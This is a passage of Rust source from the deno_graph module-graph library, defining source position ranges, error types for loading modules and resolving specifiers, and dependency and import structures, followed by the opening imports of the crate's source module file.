      column_index: self.character,
    })
  }
}
/// An inclusive start/end position range within a source file.
#[derive(Clone, Copy, Debug, Eq, PartialEq, Deserialize, Hash)]
pub struct PositionRange {
  #[serde(default = "Position::zeroed")]
  pub start: Position,
  #[serde(default = "Position::zeroed")]
  pub end: Position,
}
impl PositionRange {
  /// A range collapsed to the zero position.
  pub fn zeroed() -> Self {
    Self {
      start: Position::zeroed(),
      end: Position::zeroed(),
    }
  }
  /// Determines if a given position is within the range (inclusive
  /// on both ends).
  pub fn includes(&self, position: Position) -> bool {
    (self.start..=self.end).contains(&position)
  }
  /// Converts a swc source range into line/character form.
  #[cfg(feature = "swc")]
  pub fn from_source_range(
    range: deno_ast::SourceRange,
    text_info: &deno_ast::SourceTextInfo,
  ) -> Self {
    let start = Position::from_source_pos(range.start, text_info);
    let end = Position::from_source_pos(range.end, text_info);
    Self { start, end }
  }
  /// Converts this range back into a swc source range.
  #[cfg(feature = "swc")]
  pub fn as_source_range(
    &self,
    text_info: &deno_ast::SourceTextInfo,
  ) -> deno_ast::SourceRange {
    let start = self.start.as_source_pos(text_info);
    let end = self.end.as_source_pos(text_info);
    deno_ast::SourceRange::new(start, end)
  }
}
// Custom serialization to serialize to an array. Interestingly we
// don't need to implement custom deserialization logic that does
// the same thing, and serde_json will handle it fine.
impl Serialize for PositionRange {
  fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
  where
    S: Serializer,
  {
    // Serializes a `Position` as a `[line, character]` tuple.
    struct PositionSerializer<'a>(&'a Position);
    impl Serialize for PositionSerializer<'_> {
      fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
      where
        S: Serializer,
      {
        let mut seq = serializer.serialize_tuple(2)?;
        seq.serialize_element(&self.0.line)?;
        seq.serialize_element(&self.0.character)?;
        seq.end()
      }
    }
    // The full range becomes `[[start line, start char], [end line, end char]]`.
    let mut seq = serializer.serialize_tuple(2)?;
    seq.serialize_element(&PositionSerializer(&self.start))?;
    seq.serialize_element(&PositionSerializer(&self.end))?;
    seq.end()
  }
}
/// A position range tied to the module (specifier) it appears in.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, Hash)]
pub struct Range {
  #[serde(skip_serializing)]
  pub specifier: ModuleSpecifier,
  #[serde(flatten, serialize_with = "serialize_position")]
  pub range: PositionRange,
  #[serde(default, skip_serializing)]
  pub resolution_mode: Option<ResolutionMode>,
}
/// Serializes a `PositionRange` as a struct with `start`/`end` fields
/// (used when the range is flattened into its parent).
fn serialize_position<S: Serializer>(
  range: &PositionRange,
  serializer: S,
) -> Result<S::Ok, S::Error> {
  let mut state = serializer.serialize_struct("PositionRange", 2)?;
  state.serialize_field("start", &range.start)?;
  state.serialize_field("end", &range.end)?;
  state.end()
}
impl fmt::Display for Range {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{}:{}", self.specifier, self.range.start)
}
}
impl Range {
  /// Determines if a given position is within the range.
  pub fn includes(&self, position: Position) -> bool {
    self.range.includes(position)
  }
}
/// Errors that can occur while loading JSR package data.
#[derive(Debug, Clone, Error, JsError)]
pub enum JsrLoadError {
  #[class(type)]
  #[error(
    "Unsupported checksum in JSR package manifest. Maybe try upgrading deno?"
  )]
  UnsupportedManifestChecksum,
  #[class(inherit)]
  #[error(transparent)]
  ContentChecksumIntegrity(ChecksumIntegrityError),
  #[class(generic)]
  #[error(
    "Loader should never return an external specifier for a jsr: specifier content load."
  )]
  ContentLoadExternalSpecifier,
  #[class(inherit)]
  #[error(transparent)]
  ContentLoad(Arc<LoadError>),
  #[class(inherit)]
  #[error("JSR package manifest for '{}' failed to load. {:#}", .0, .1)]
  PackageManifestLoad(String, #[inherit] Arc<LoadError>),
  #[class("NotFound")]
  #[error("JSR package not found: {}", .0)]
  PackageNotFound(String),
  #[class("NotFound")]
  #[error("JSR package version not found: {}", .0)]
  PackageVersionNotFound(Box<PackageNv>),
  #[class(inherit)]
  #[error("JSR package version manifest for '{}' failed to load: {:#}", .0, .1)]
  PackageVersionManifestLoad(Box<PackageNv>, #[inherit] Arc<dyn JsErrorClass>),
  #[class(inherit)]
  #[error("JSR package version manifest for '{}' failed to load: {:#}", .0, .1)]
  PackageVersionManifestChecksumIntegrity(
    Box<PackageNv>,
    #[inherit] ChecksumIntegrityError,
  ),
  #[class(inherit)]
  #[error(transparent)]
  PackageFormat(JsrPackageFormatError),
  #[class(inherit)]
  #[error(transparent)]
  PackageReqNotFound(JsrPackageReqNotFoundError),
  #[class(generic)]
  #[error("Redirects in the JSR registry are not supported (redirected to '{}')", .0)]
  RedirectInPackage(ModuleSpecifier),
  #[class("NotFound")]
  #[error("Unknown export '{}' for '{}'.\n Package exports:\n{}", export_name, .nv, .exports.iter().map(|e| format!(" * {}", e)).collect::<Vec<_>>().join("\n"))]
  UnknownExport {
    nv: Box<PackageNv>,
    export_name: String,
    exports: Vec<String>,
  },
}
/// No version of a JSR package satisfied the requested version constraint.
#[derive(Error, Debug, Clone, JsError)]
#[class("NotFound")]
#[error("Could not find version of '{}' that matches specified version constraint '{}'{}", req.name, req.version_req, newest_dependency_date.map(|v| format!("\n\nA newer matching version was found, but it was not used because it was newer than the specified minimum dependency date of {}", v)).unwrap_or_else(String::new))]
pub struct JsrPackageReqNotFoundError {
  pub req: PackageReq,
  /// Set when a match existed but exceeded the minimum dependency date.
  pub newest_dependency_date: Option<NewestDependencyDate>,
}
/// The jsr specifier itself was malformed or used unsupported syntax.
#[derive(Error, Debug, Clone, JsError)]
#[class(type)]
pub enum JsrPackageFormatError {
  #[error(transparent)]
  JsrPackageParseError(PackageReqReferenceParseError),
  #[error("Version tag not supported in jsr specifiers ('{}').{}",
    .tag,
    match .tag.strip_prefix('v').and_then(|v| VersionReq::parse_from_specifier(v).ok().map(|s| s.tag().is_none())).unwrap_or(false) {
      true => " Remove leading 'v' before version.",
      false => ""
    }
  )]
  VersionTagNotSupported { tag: SmallStackString },
}
/// Errors that can occur while resolving npm specifiers.
#[derive(Debug, Clone, Error, JsError)]
pub enum NpmLoadError {
  #[class(type)]
  #[error("npm specifiers are not supported in this environment")]
  NotSupportedEnvironment,
  #[class(inherit)]
  #[error(transparent)]
  PackageReqResolution(Arc<dyn JsErrorClass>),
  #[class(inherit)]
  #[error(transparent)]
  PackageReqReferenceParse(PackageReqReferenceParseError),
  #[class(inherit)]
  #[error(transparent)]
  RegistryInfo(Arc<dyn JsErrorClass>),
}
/// Errors that can occur while loading a module's content.
#[derive(Debug, Error, Clone, JsError)]
pub enum ModuleLoadError {
  #[class(inherit)]
  #[error(transparent)]
  HttpsChecksumIntegrity(ChecksumIntegrityError),
  #[class(inherit)]
  #[error(transparent)]
  Decode(Arc<DecodeError>),
  #[class(inherit)]
  #[error(transparent)]
  Loader(Arc<LoadError>),
  #[class(inherit)]
  #[error(transparent)]
  Jsr(#[from] JsrLoadError),
  #[class(inherit)]
  #[error(transparent)]
  Npm(#[from] NpmLoadError),
  #[class(generic)]
  #[error("Too many redirects.")]
  TooManyRedirects,
}
/// A failure decoding a loaded file's bytes into text.
#[derive(Debug, JsError)]
#[class(inherit)]
pub struct DecodeError {
  /// Modified time of the underlying file. Used to tell whether
  /// the file should be reloaded.
  pub mtime: Option<SystemTime>,
  #[inherit]
  pub err: std::io::Error,
}
impl std::error::Error for DecodeError {
  fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
    // Surface the wrapped I/O error's source, not the wrapper itself.
    self.err.source()
  }
}
impl std::fmt::Display for DecodeError {
  fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
    // Render exactly as the wrapped I/O error renders.
    fmt::Display::fmt(&self.err, f)
  }
}
/// An error related to a specific module (a boxed [`ModuleErrorKind`]).
#[derive(Debug, Clone, JsError, Boxed)]
pub struct ModuleError(pub Box<ModuleErrorKind>);
impl ModuleError {
  /// The specifier of the module this error relates to.
  pub fn specifier(&self) -> &ModuleSpecifier {
    self.as_kind().specifier()
  }
  /// The range in the importing module, when the error has a referrer.
  pub fn maybe_referrer(&self) -> Option<&Range> {
    self.as_kind().maybe_referrer()
  }
  /// Gets the mtime (if able) of the loaded file that caused this error.
  pub fn mtime(&self) -> Option<SystemTime> {
    self.as_kind().mtime()
  }
  /// Converts the error into a string along with the range related to the error.
  pub fn to_string_with_range(&self) -> String {
    self.as_kind().to_string_with_range()
  }
}
/// The specific ways loading or parsing a module can fail.
#[derive(Debug, Clone, JsError)]
pub enum ModuleErrorKind {
  /// The module's content failed to load.
  #[class(inherit)]
  Load {
    specifier: ModuleSpecifier,
    maybe_referrer: Option<Range>,
    #[inherit]
    err: ModuleLoadError,
  },
  /// A statically imported module could not be found.
  #[class("NotFound")]
  Missing {
    specifier: ModuleSpecifier,
    maybe_referrer: Option<Range>,
  },
  /// A dynamically imported module could not be found.
  #[class("NotFound")]
  MissingDynamic {
    specifier: ModuleSpecifier,
    referrer: Range,
  },
  #[class(inherit)]
  Parse {
    specifier: ModuleSpecifier,
    /// Modified time of the underlying file. Used to tell whether
    /// the file should be reloaded.
    mtime: Option<SystemTime>,
    #[inherit]
    diagnostic: Arc<JsErrorBox>,
  },
  #[class(inherit)]
  WasmParse {
    specifier: ModuleSpecifier,
    /// Modified time of the underlying file. Used to tell whether
    /// the file should be reloaded.
    mtime: Option<SystemTime>,
    #[inherit]
    err: wasm_dep_analyzer::ParseError,
  },
  #[class(type)]
  UnsupportedMediaType {
    specifier: ModuleSpecifier,
    media_type: MediaType,
    maybe_referrer: Option<Range>,
  },
  /// The media type found did not match the import attribute's assertion.
  #[class(syntax)]
  InvalidTypeAssertion {
    specifier: ModuleSpecifier,
    referrer: Range,
    actual_media_type: MediaType,
    expected_media_type: MediaType,
  },
  #[class(type)]
  UnsupportedImportAttributeType {
    specifier: ModuleSpecifier,
    referrer: Range,
    kind: String,
  },
  #[class(type)]
  UnsupportedModuleTypeForSourcePhaseImport {
    specifier: ModuleSpecifier,
    referrer: Range,
    actual_media_type: MediaType,
    actual_attribute_type: Option<String>,
  },
}
impl ModuleErrorKind {
  /// The specifier of the module this error relates to.
  pub fn specifier(&self) -> &ModuleSpecifier {
    match self {
      Self::Load { specifier, .. }
      | Self::Parse { specifier, .. }
      | Self::WasmParse { specifier, .. }
      | Self::UnsupportedMediaType { specifier, .. }
      | Self::Missing { specifier, .. }
      | Self::MissingDynamic { specifier, .. }
      | Self::InvalidTypeAssertion { specifier, .. }
      | Self::UnsupportedImportAttributeType { specifier, .. } => specifier,
      Self::UnsupportedModuleTypeForSourcePhaseImport { specifier, .. } => {
        specifier
      }
    }
  }
  /// The range in the importing module, for variants that carry one.
  pub fn maybe_referrer(&self) -> Option<&Range> {
    match self {
      Self::Load { maybe_referrer, .. }
      | Self::Missing { maybe_referrer, .. } => maybe_referrer.as_ref(),
      Self::UnsupportedMediaType { maybe_referrer, .. } => {
        maybe_referrer.as_ref()
      }
      Self::Parse { .. } => None,
      Self::WasmParse { .. } => None,
      Self::MissingDynamic { referrer, .. }
      | Self::InvalidTypeAssertion { referrer, .. }
      | Self::UnsupportedImportAttributeType { referrer, .. }
      | Self::UnsupportedModuleTypeForSourcePhaseImport { referrer, .. } => {
        Some(referrer)
      }
    }
  }
  /// Gets the mtime (if able) of the loaded file that caused this error.
  pub fn mtime(&self) -> Option<SystemTime> {
    match self {
      Self::Parse { mtime, .. } | Self::WasmParse { mtime, .. } => *mtime,
      Self::Load { err, .. } => match err {
        ModuleLoadError::Decode(decode_error) => decode_error.mtime,
        ModuleLoadError::HttpsChecksumIntegrity { .. }
        | ModuleLoadError::Loader { .. }
        | ModuleLoadError::Jsr { .. }
        | ModuleLoadError::Npm { .. }
        | ModuleLoadError::TooManyRedirects => None,
      },
      Self::Missing { .. }
      | Self::MissingDynamic { .. }
      | Self::UnsupportedMediaType { .. }
      | Self::InvalidTypeAssertion { .. }
      | Self::UnsupportedImportAttributeType { .. }
      | Self::UnsupportedModuleTypeForSourcePhaseImport { .. } => None,
    }
  }
  /// Converts the error into a string along with the range related to the error.
  pub fn to_string_with_range(&self) -> String {
    if let Some(range) = self.maybe_referrer() {
      format!("{self:#}\n    at {range}")
    } else {
      format!("{self:#}")
    }
  }
}
impl std::error::Error for ModuleErrorKind {
  fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
    // Only `Load` wraps an underlying error; all other variants are leaves.
    match self {
      Self::Load { err, .. } => Some(err),
      Self::Missing { .. }
      | Self::MissingDynamic { .. }
      | Self::Parse { .. }
      | Self::WasmParse { .. }
      | Self::UnsupportedMediaType { .. }
      | Self::InvalidTypeAssertion { .. }
      | Self::UnsupportedImportAttributeType { .. }
      | Self::UnsupportedModuleTypeForSourcePhaseImport { .. } => None,
    }
  }
}
impl fmt::Display for ModuleErrorKind {
  fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
    // Media-type-specific arms give actionable hints (e.g. suggesting a
    // `type: "json"` import attribute) before the generic fallbacks.
    match self {
      Self::Load { err, .. } => err.fmt(f),
      Self::Parse { diagnostic, .. } => write!(
        f,
        "The module's source code could not be parsed: {diagnostic}"
      ),
      Self::WasmParse { specifier, err, .. } => write!(
        f,
        "The Wasm module could not be parsed: {err}\n Specifier: {specifier}"
      ),
      Self::UnsupportedMediaType {
        specifier,
        media_type: MediaType::Json,
        ..
      } => write!(
        f,
        "Expected a JavaScript or TypeScript module, but identified a Json module. Consider importing Json modules with an import attribute with the type of \"json\".\n Specifier: {specifier}"
      ),
      Self::UnsupportedMediaType {
        specifier,
        media_type: MediaType::Cjs | MediaType::Cts,
        ..
      } if specifier.scheme() != "file" => write!(
        f,
        "Remote CJS modules are not supported.\n Specifier: {specifier}"
      ),
      Self::UnsupportedMediaType {
        specifier,
        media_type,
        ..
      } => write!(
        f,
        "Expected a JavaScript or TypeScript module, but identified a {media_type} module. Importing these types of modules is currently not supported.\n Specifier: {specifier}"
      ),
      Self::Missing { specifier, .. } => {
        write!(f, "Module not found \"{specifier}\".")
      }
      Self::MissingDynamic { specifier, .. } => {
        write!(f, "Dynamic import not found \"{specifier}\".")
      }
      Self::InvalidTypeAssertion {
        specifier,
        actual_media_type: MediaType::Json,
        expected_media_type,
        ..
      } => write!(
        f,
        "Expected a {expected_media_type} module, but identified a Json module. Consider importing Json modules with an import attribute with the type of \"json\".\n Specifier: {specifier}"
      ),
      Self::InvalidTypeAssertion {
        specifier,
        actual_media_type,
        expected_media_type,
        ..
      } => write!(
        f,
        "Expected a {expected_media_type} module, but identified a {actual_media_type} module.\n Specifier: {specifier}"
      ),
      Self::UnsupportedImportAttributeType {
        specifier, kind, ..
      } => write!(
        f,
        "The import attribute type of \"{kind}\" is unsupported.\n Specifier: {specifier}"
      ),
      Self::UnsupportedModuleTypeForSourcePhaseImport {
        specifier,
        actual_media_type,
        actual_attribute_type: None,
        ..
      } => write!(
        f,
        "Importing {actual_media_type} modules at source phase is unsupported.\n Specifier: {specifier}"
      ),
      Self::UnsupportedModuleTypeForSourcePhaseImport {
        specifier,
        actual_media_type,
        actual_attribute_type: Some(actual_attribute_type),
        ..
      } => write!(
        f,
        "Importing {actual_media_type} modules with {{ type: \"{actual_attribute_type}\" }} at source phase is unsupported.\n Specifier: {specifier}"
      ),
    }
  }
}
/// An error found while building or walking a module graph.
#[derive(Debug, Clone, JsError)]
pub enum ModuleGraphError {
  #[class(inherit)]
  ModuleError(ModuleError),
  /// A failure resolving a specifier for execution.
  #[class(inherit)]
  ResolutionError(ResolutionError),
  /// A failure resolving a specifier for types.
  #[class(inherit)]
  TypesResolutionError(ResolutionError),
}
impl ModuleGraphError {
  /// Returns the inner module error kind when this is a `ModuleError`.
  pub fn as_module_error_kind(&self) -> Option<&ModuleErrorKind> {
    if let Self::ModuleError(err) = self {
      Some(err.as_kind())
    } else {
      None
    }
  }

  /// Wraps a resolution error in the variant matching the resolution kind.
  fn for_resolution_kind(kind: ResolutionKind, error: ResolutionError) -> Self {
    match kind {
      ResolutionKind::Execution => Self::ResolutionError(error),
      ResolutionKind::Types => Self::TypesResolutionError(error),
    }
  }

  /// Converts the error into a string along with the range related to the error.
  ///
  /// We don't include the range in the error messages by default because they're
  /// not useful in cases like the LSP where the range is given by the editor itself.
  pub fn to_string_with_range(&self) -> String {
    match self {
      Self::ModuleError(err) => err.to_string_with_range(),
      Self::ResolutionError(err) | Self::TypesResolutionError(err) => {
        err.to_string_with_range()
      }
    }
  }

  /// Returns the source range associated with this error, if any.
  pub fn maybe_range(&self) -> Option<&Range> {
    match self {
      // module errors only optionally carry a referrer range
      Self::ModuleError(err) => err.maybe_referrer(),
      // resolution errors always carry a range
      Self::ResolutionError(err) | Self::TypesResolutionError(err) => {
        Some(err.range())
      }
    }
  }
}
impl std::error::Error for ModuleGraphError {
  fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
    // Every variant wraps an underlying error; surface it as the source.
    let source: &(dyn std::error::Error + 'static) = match self {
      Self::ModuleError(err) => err,
      Self::ResolutionError(err) | Self::TypesResolutionError(err) => err,
    };
    Some(source)
  }
}
impl fmt::Display for ModuleGraphError {
  fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
    match self {
      // Type resolution failures are prefixed so they can be distinguished
      // from execution resolution failures; other variants display verbatim.
      Self::TypesResolutionError(err) => {
        write!(f, "Failed resolving types. {err}")
      }
      Self::ModuleError(err) => write!(f, "{err}"),
      Self::ResolutionError(err) => write!(f, "{err}"),
    }
  }
}
/// Errors that can occur while resolving a dependency specifier.
#[derive(Debug, Clone, JsError)]
#[class(type)]
pub enum ResolutionError {
  /// An https module attempted to import an http module.
  InvalidDowngrade {
    specifier: ModuleSpecifier,
    range: Range,
  },
  /// A JSR package was imported via an https specifier for type checking,
  /// which is not supported.
  InvalidJsrHttpsTypesImport {
    specifier: ModuleSpecifier,
    range: Range,
  },
  /// A remote module attempted to statically import a local module.
  InvalidLocalImport {
    specifier: ModuleSpecifier,
    range: Range,
  },
  /// The specifier text itself could not be parsed.
  InvalidSpecifier {
    error: SpecifierError,
    range: Range,
  },
  /// A custom resolver returned an error.
  ResolverError {
    error: Arc<ResolveError>,
    specifier: String,
    range: Range,
  },
}
impl ResolutionError {
  /// Return a reference to the range that the error applies to.
  pub fn range(&self) -> &Range {
    // Every variant carries a `range` field.
    match self {
      Self::InvalidDowngrade { range, .. } => range,
      Self::InvalidJsrHttpsTypesImport { range, .. } => range,
      Self::InvalidLocalImport { range, .. } => range,
      Self::InvalidSpecifier { range, .. } => range,
      Self::ResolverError { range, .. } => range,
    }
  }

  /// Converts the error into a string along with the range related to the error.
  pub fn to_string_with_range(&self) -> String {
    format!("{}\n    at {}", self, self.range())
  }
}
impl std::error::Error for ResolutionError {
  fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
    // Only the specifier-parse and resolver variants wrap an inner error;
    // kept exhaustive so new variants force a decision here.
    match self {
      Self::InvalidSpecifier { error, .. } => Some(error),
      Self::ResolverError { error, .. } => Some(error.as_ref()),
      Self::InvalidDowngrade { .. }
      | Self::InvalidJsrHttpsTypesImport { .. }
      | Self::InvalidLocalImport { .. } => None,
    }
  }
}
// Manual equality: `ResolverError`'s wrapped error value is not comparable,
// so that variant is compared by its specifier text and range instead. The
// other variants likewise compare only their payload and range.
impl PartialEq for ResolutionError {
  fn eq(&self, other: &Self) -> bool {
    match (self, other) {
      // compared by specifier text + range; the inner error is ignored
      (
        Self::ResolverError {
          specifier: a,
          range: a_range,
          ..
        },
        Self::ResolverError {
          specifier: b,
          range: b_range,
          ..
        },
      ) => a == b && a_range == b_range,
      // the three specifier-carrying variants share identical comparison logic
      (
        Self::InvalidDowngrade {
          specifier: a,
          range: a_range,
          ..
        },
        Self::InvalidDowngrade {
          specifier: b,
          range: b_range,
          ..
        },
      )
      | (
        Self::InvalidJsrHttpsTypesImport {
          specifier: a,
          range: a_range,
          ..
        },
        Self::InvalidJsrHttpsTypesImport {
          specifier: b,
          range: b_range,
          ..
        },
      )
      | (
        Self::InvalidLocalImport {
          specifier: a,
          range: a_range,
          ..
        },
        Self::InvalidLocalImport {
          specifier: b,
          range: b_range,
          ..
        },
      ) => a == b && a_range == b_range,
      (
        Self::InvalidSpecifier {
          error: a,
          range: a_range,
          ..
        },
        Self::InvalidSpecifier {
          error: b,
          range: b_range,
          ..
        },
      ) => a == b && a_range == b_range,
      // mismatched variants are never equal
      _ => false,
    }
  }
}
impl Eq for ResolutionError {}
impl fmt::Display for ResolutionError {
  // User-facing error messages; the literal text here is load-bearing (it is
  // surfaced directly to users), so keep wording/whitespace stable.
  fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
    match self {
      Self::InvalidDowngrade { specifier, .. } => write!(
        f,
        "Modules imported via https are not allowed to import http modules.\n  Importing: {specifier}"
      ),
      Self::InvalidJsrHttpsTypesImport { specifier, .. } => write!(
        f,
        "Importing JSR packages via HTTPS specifiers for type checking is not supported for performance reasons. If you would like types, import via a `jsr:` specifier instead or else use a non-statically analyzable dynamic import.\n  Importing: {specifier}"
      ),
      Self::InvalidLocalImport { specifier, .. } => write!(
        f,
        "Remote modules are not allowed to import local modules. Consider using a dynamic import instead.\n  Importing: {specifier}"
      ),
      // these variants delegate to the wrapped error's own message
      Self::ResolverError { error, .. } => error.fmt(f),
      Self::InvalidSpecifier { error, .. } => error.fmt(f),
    }
  }
}
/// A successfully resolved dependency.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ResolutionResolved {
  /// The specifier the dependency resolved to.
  pub specifier: ModuleSpecifier,
  /// The range in the referrer where the dependency was specified.
  pub range: Range,
}
/// The outcome of resolving a dependency specifier.
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum Resolution {
  /// No resolution was attempted or recorded.
  None,
  /// The specifier resolved successfully.
  Ok(Box<ResolutionResolved>),
  /// Resolution failed.
  Err(Box<ResolutionError>),
}
impl Resolution {
  /// Builds a `Resolution` from a resolver result, attributing the provided
  /// referrer `range` to either the success value or the error.
  pub fn from_resolve_result(
    result: Result<ModuleSpecifier, ResolveError>,
    specifier_text: &str,
    range: Range,
  ) -> Self {
    match result {
      Ok(specifier) => {
        Resolution::Ok(Box::new(ResolutionResolved { specifier, range }))
      }
      Err(err) => {
        let resolution_error =
          if let ResolveError::Specifier(specifier_error) = err {
            ResolutionError::InvalidSpecifier {
              // the pattern binds `specifier_error` by value, so it can be
              // moved directly — the previous `.clone()` here was redundant
              error: specifier_error,
              range,
            }
          } else {
            ResolutionError::ResolverError {
              error: Arc::new(err),
              specifier: specifier_text.to_string(),
              range,
            }
          };
        Self::Err(Box::new(resolution_error))
      }
    }
  }

  /// Returns the range associated with this resolution (the resolved range on
  /// success or the error's range on failure) when `position` falls inside it.
  pub fn includes(&self, position: Position) -> Option<&Range> {
    match self {
      Self::Ok(resolution) if resolution.range.includes(position) => {
        Some(&resolution.range)
      }
      Self::Err(err) => {
        let range = err.range();
        if range.includes(position) {
          Some(range)
        } else {
          None
        }
      }
      _ => None,
    }
  }

  /// True when no resolution was recorded.
  pub fn is_none(&self) -> bool {
    matches!(self, Self::None)
  }

  /// The resolved specifier, if resolution succeeded.
  pub fn maybe_specifier(&self) -> Option<&ModuleSpecifier> {
    self.ok().map(|r| &r.specifier)
  }

  /// The range associated with the resolution, if any was recorded.
  pub fn maybe_range(&self) -> Option<&Range> {
    match self {
      Resolution::None => None,
      Resolution::Ok(r) => Some(&r.range),
      Resolution::Err(e) => Some(e.range()),
    }
  }

  /// The successful resolution, if any.
  pub fn ok(&self) -> Option<&ResolutionResolved> {
    if let Resolution::Ok(resolved) = self {
      Some(&**resolved)
    } else {
      None
    }
  }

  /// The resolution error, if any.
  pub fn err(&self) -> Option<&ResolutionError> {
    if let Resolution::Err(err) = self {
      Some(&**err)
    } else {
      None
    }
  }
}
impl Default for Resolution {
fn default() -> Self {
Self::None
}
}
/// Serde helper used by `skip_serializing_if` to omit `false` boolean fields.
fn is_false(v: &bool) -> bool {
  !*v
}
/// The kind of syntax a dependency was imported with.
#[derive(Clone, Copy, Debug, Serialize, Eq, PartialEq)]
#[serde(rename_all = "camelCase")]
pub enum ImportKind {
  /// `import`/`export`
  Es,
  /// `import source`
  EsSource,
  /// `require`
  Require,
  /// `import type`/`export type`
  TsType,
  /// `declare module "@tanstack/react-router" {}`
  TsModuleAugmentation,
  /// `/// <reference path="..." />`
  TsReferencePath,
  /// `/// <reference types="..." />`
  TsReferenceTypes,
  /// `/** @jsxImportSource ... */`
  JsxImportSource,
  /// `/** @typedef { import("./types").Pet } Pet */`
  JsDoc,
}
impl ImportKind {
pub fn is_runtime(&self) -> bool {
match self {
ImportKind::Es
| ImportKind::EsSource
| ImportKind::Require
| ImportKind::JsxImportSource => true,
ImportKind::TsType
| ImportKind::TsModuleAugmentation
| ImportKind::TsReferencePath
| ImportKind::TsReferenceTypes
| ImportKind::JsDoc => false,
}
}
pub fn is_source_phase(&self) -> bool {
match self {
ImportKind::EsSource => true,
ImportKind::Es
| ImportKind::Require
| ImportKind::JsxImportSource
| ImportKind::TsType
| ImportKind::TsModuleAugmentation
| ImportKind::TsReferencePath
| ImportKind::TsReferenceTypes
| ImportKind::JsDoc => false,
}
}
fn is_es(&self) -> bool {
matches!(self, ImportKind::Es)
}
}
/// A single import statement or directive discovered in a module.
#[derive(Clone, Debug, Eq, PartialEq, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Import {
  /// The raw specifier text as written in the source.
  pub specifier: String,
  /// What kind of syntax the import used (omitted when plain `import`).
  #[serde(skip_serializing_if = "ImportKind::is_es")]
  pub kind: ImportKind,
  /// The source range of the specifier within the importing module.
  #[serde(rename = "range")]
  pub specifier_range: Range,
  /// Whether this was a dynamic import (omitted when `false`).
  #[serde(skip_serializing_if = "is_false")]
  pub is_dynamic: bool,
  /// If this is an import for only side effects (ex. `import './load.js';`)
  #[serde(skip_serializing)]
  pub is_side_effect: bool,
  // Don't include attributes in `deno info --json` until someone has a need.
  // Attribute error strings eventually will be included in a separate `Import::errors`, however.
  #[serde(skip_serializing)]
  pub attributes: ImportAttributes,
}
/// A dependency of a module: its code and/or type resolutions plus the
/// imports that referenced it.
#[derive(Debug, Default, Clone, Eq, PartialEq, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Dependency {
  /// Resolution of the dependency for execution.
  #[serde(rename = "code", skip_serializing_if = "Resolution::is_none")]
  pub maybe_code: Resolution,
  /// Resolution of the dependency for type information.
  #[serde(rename = "type", skip_serializing_if = "Resolution::is_none")]
  pub maybe_type: Resolution,
  /// The specifier text from an associated `@deno-types` directive, if any.
  #[serde(skip_serializing)]
  pub maybe_deno_types_specifier: Option<String>,
  /// Whether the dependency was dynamically imported (omitted when `false`).
  #[serde(skip_serializing_if = "is_false")]
  pub is_dynamic: bool,
  // todo(dsherret): rename to attributeType in 3.0
  #[serde(rename = "assertionType", skip_serializing_if = "Option::is_none")]
  pub maybe_attribute_type: Option<String>,
  // TODO(nayeemrmn): Replace `maybe_attribute_type` with this in the serialization
  // for 3.0.
  #[serde(skip_serializing)]
  pub imports: Vec<Import>,
}
impl Dependency {
/// Optionally return the module specifier in the module graph that points to
/// the "code" dependency in the graph.
pub fn get_code(&self) -> Option<&ModuleSpecifier> {
self.maybe_code.maybe_specifier()
}
/// Optionally return the module specifier in the module graph that points to
/// the type only dependency in the graph.
pub fn get_type(&self) -> Option<&ModuleSpecifier> {
self.maybe_type.maybe_specifier()
}
/// Check to see if the position falls within the range of the code or types
/// entry for the dependency, returning a reference to the range if true,
/// otherwise none.
pub fn includes(&self, position: Position) -> Option<&Range> {
for import in &self.imports {
if import.specifier_range.includes(position) {
return Some(&import.specifier_range);
}
}
// `@deno-types` directives won't be associated with an import.
if let Some(range) = self.maybe_type.includes(position) {
return Some(range);
}
None
}
pub fn with_new_resolver(
&self,
specifier: &str,
jsr_url_provider: &dyn JsrUrlProvider,
maybe_resolver: Option<&dyn Resolver>,
) -> Self {
let maybe_code = self
.maybe_code
.maybe_range()
.map(|r| {
resolve(
specifier,
r.clone(),
ResolutionKind::Execution,
jsr_url_provider,
maybe_resolver,
)
})
.unwrap_or_default();
let maybe_type = self
.maybe_type
.maybe_range()
.map(|r| {
resolve(
self
.maybe_deno_types_specifier
.as_deref()
.unwrap_or(specifier),
r.clone(),
ResolutionKind::Types,
jsr_url_provider,
maybe_resolver,
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/source/mod.rs | src/source/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::HashMap;
use std::fmt;
use std::path::Path;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::SystemTime;
use async_trait::async_trait;
use deno_error::JsErrorClass;
use deno_media_type::MediaType;
use deno_media_type::data_url::RawDataUrl;
use deno_semver::StackString;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use futures::FutureExt;
use futures::future;
use futures::future::LocalBoxFuture;
use once_cell::sync::Lazy;
use serde::Deserialize;
use serde::Serialize;
use sys_traits::BaseFsReadDir;
use sys_traits::boxed::BoxedFsDirEntry;
use sys_traits::boxed::FsReadDirBoxed;
use thiserror::Error;
use url::Url;
use crate::ModuleSpecifier;
use crate::NpmLoadError;
use crate::SpecifierError;
use crate::analysis::ModuleInfo;
use crate::graph::Range;
use crate::module_specifier::resolve_import;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
/// Object-safe file system abstraction used for reading directories.
pub type FileSystem = dyn FsReadDirBoxed;
/// A file system implementation that contains no entries.
pub struct NullFileSystem;
impl BaseFsReadDir for NullFileSystem {
